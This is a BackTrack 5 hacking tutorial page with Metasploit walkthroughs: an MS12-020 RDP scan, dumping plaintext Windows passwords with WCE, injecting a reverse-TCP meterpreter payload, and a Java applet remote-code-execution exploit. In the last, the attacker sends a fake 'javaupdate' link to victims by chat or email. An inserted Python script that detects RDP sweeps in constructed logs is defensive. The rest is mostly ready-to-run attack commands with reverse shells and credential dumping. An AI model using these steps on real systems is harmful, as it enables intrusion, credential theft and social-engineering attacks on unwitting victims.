BackTrack 5 Tutorials
How to Check Enabled Remote Desktop Service in Network with Metasploit
This module checks a range of hosts for the MS12-020 vulnerability. This does not cause a DoS on the target.
Exploit Targets
Windows PC
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open a BackTrack terminal and type msfconsole

Now type use auxiliary/scanner/rdp/ms12-020_check
msf auxiliary(ms12-020_check) > set rhosts 192.168.1.1/24 (Target Host Range)
msf auxiliary(ms12-020_check) > set threads 1
msf auxiliary(ms12-020_check) > exploit
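From the defender's side, the scan above shows up as one source address opening TCP/3389 connections to many hosts within a few seconds. The following Python script is an added example and is not part of this tutorial or of Metasploit: it parses constructed firewall-style log lines (the line format, the 60-second window and the 5-host threshold are all assumptions) and reports any source that touches RDP on that many distinct hosts inside one window. Dropped probes are counted as well as accepted ones, since a blocked connection attempt is still evidence of the sweep.

```python
"""Detect an RDP (TCP/3389) sweep from firewall-style log lines.

Added example, not part of the original tutorial. The log format, the
window length and the host threshold are assumptions made for the demo.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Assumed line format: "<ISO timestamp> <src_ip> -> <dst_ip>:<dst_port> <action>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+) (?P<action>\w+)$"
)

# Constructed sample log: 192.168.1.3 sweeps 3389 across eight hosts in four
# seconds, 192.168.1.50 is an ordinary admin connecting twice to one host, and
# one line is deliberately malformed to show that parsing skips it.
SAMPLE_LOG = """\
2012-03-15T10:00:01 192.168.1.3 -> 192.168.1.10:3389 ACCEPT
2012-03-15T10:00:01 192.168.1.3 -> 192.168.1.11:3389 ACCEPT
2012-03-15T10:00:02 192.168.1.3 -> 192.168.1.12:3389 DROP
2012-03-15T10:00:02 192.168.1.3 -> 192.168.1.13:3389 ACCEPT
2012-03-15T10:00:02 192.168.1.50 -> 192.168.1.10:3389 ACCEPT
2012-03-15T10:00:03 192.168.1.3 -> 192.168.1.14:3389 DROP
2012-03-15T10:00:03 192.168.1.3 -> 192.168.1.15:3389 ACCEPT
2012-03-15T10:00:03 192.168.1.3 -> 192.168.1.20:445 ACCEPT
2012-03-15T10:00:04 192.168.1.3 -> 192.168.1.16:3389 ACCEPT
2012-03-15T10:00:04 192.168.1.3 -> 192.168.1.17:3389 ACCEPT
2012-03-15T10:05:00 192.168.1.50 -> 192.168.1.10:3389 ACCEPT
2012-03-15T10:30:00 192.168.1.3 -> 192.168.1.99:3389 ACCEPT
this is not a log line
"""


def parse_line(line):
    """Parse one log line into a dict; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["port"] = int(rec["port"])
    return rec


def find_rdp_sweeps(log_text, min_hosts=5, window=timedelta(seconds=60), port=3389):
    """Return {src: peak number of distinct hosts contacted on `port` within any
    sliding `window`} for every source whose peak reaches `min_hosts`.
    Both ACCEPT and DROP lines count: a blocked probe still shows the sweep."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["port"] == port:
            events[rec["src"]].append((rec["ts"], rec["dst"]))

    sweeps = {}
    for src, evs in events.items():
        evs.sort()                      # oldest first, so the window can slide
        in_window = Counter()           # dst -> hits currently inside the window
        left = 0
        peak = 0
        for ts, dst in evs:
            in_window[dst] += 1
            # Evict events that fell out of the window ending at `ts`.
            while ts - evs[left][0] > window:
                old_dst = evs[left][1]
                in_window[old_dst] -= 1
                if in_window[old_dst] == 0:
                    del in_window[old_dst]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= min_hosts:
            sweeps[src] = peak
    return sweeps


if __name__ == "__main__":
    for src, hosts in find_rdp_sweeps(SAMPLE_LOG).items():
        print(f"possible RDP sweep from {src}: {hosts} distinct hosts on 3389 within 60s")
```

Running the script on the constructed sample flags 192.168.1.3 with a peak of 8 hosts; the later single connection at 10:30 is outside the window and does not raise the count, and 192.168.1.50 never exceeds one destination. In practice the threshold should be tuned against the normal RDP fan-out of jump hosts and management servers so they are not reported as sweeps.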

Hack Remote Windows Passwords in Plain Text with WCE
Windows Credentials Editor (WCE) is a security tool that allows you to list logon sessions and add, change, list and delete the associated credentials (e.g. LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them on other Windows or Unix systems, and dump cleartext passwords entered by users at logon. WCE is widely used by security professionals to assess the security of Windows networks during penetration testing. It supports Windows XP, 2003, Vista, 7 and 2008.
First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC)
Step 1: Upload wce.exe to the victim PC from the meterpreter session using
upload /pentest/passwords/wce/wce.exe .
Step 2: Type shell to get the command prompt of the victim PC
Step 3: Now run wce.exe -w to dump the passwords in plaintext

Windows Manage Memory Payload Injection
This module will inject a payload into the memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.
Exploit Targets
Windows PC
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set payload windows/meterpreter/reverse_tcp
msf exploit(payload_inject) > set lhost 192.168.1.3 (IP of Local Host)
msf exploit(payload_inject) > set session 1
msf exploit(payload_inject) > exploit


Attacking a Windows, Linux or Mac PC using Java Applet Method Handle Remote Code Execution
This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.
Exploit Targets
Java 7 Update 7
Windows PC
Linux PC
Mac OS X PC
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/browser/java_jre17_method_handle
msf exploit(java_jre17_method_handle) > set payload java/shell_reverse_tcp
msf exploit(java_jre17_method_handle) > set lhost 192.168.1.3 (IP of Local Host)
msf exploit(java_jre17_method_handle) > set srvhost 192.168.1.3 (This must be an address on the local machine)
msf exploit(java_jre17_method_handle) > set uripath javaupdate (The URL path to use for this exploit)
msf exploit(java_jre17_method_handle) > exploit

The URL to give to the victim is http://192.168.1.3:8080/javaupdate

Send the link of the server to the victim via chat, email or any other social engineering technique.
Once the victim opens the link you have access to the victim's PC. Use "sessions -l" to list the sessions and note the session number, then type "sessions -i ID" to connect to that session.
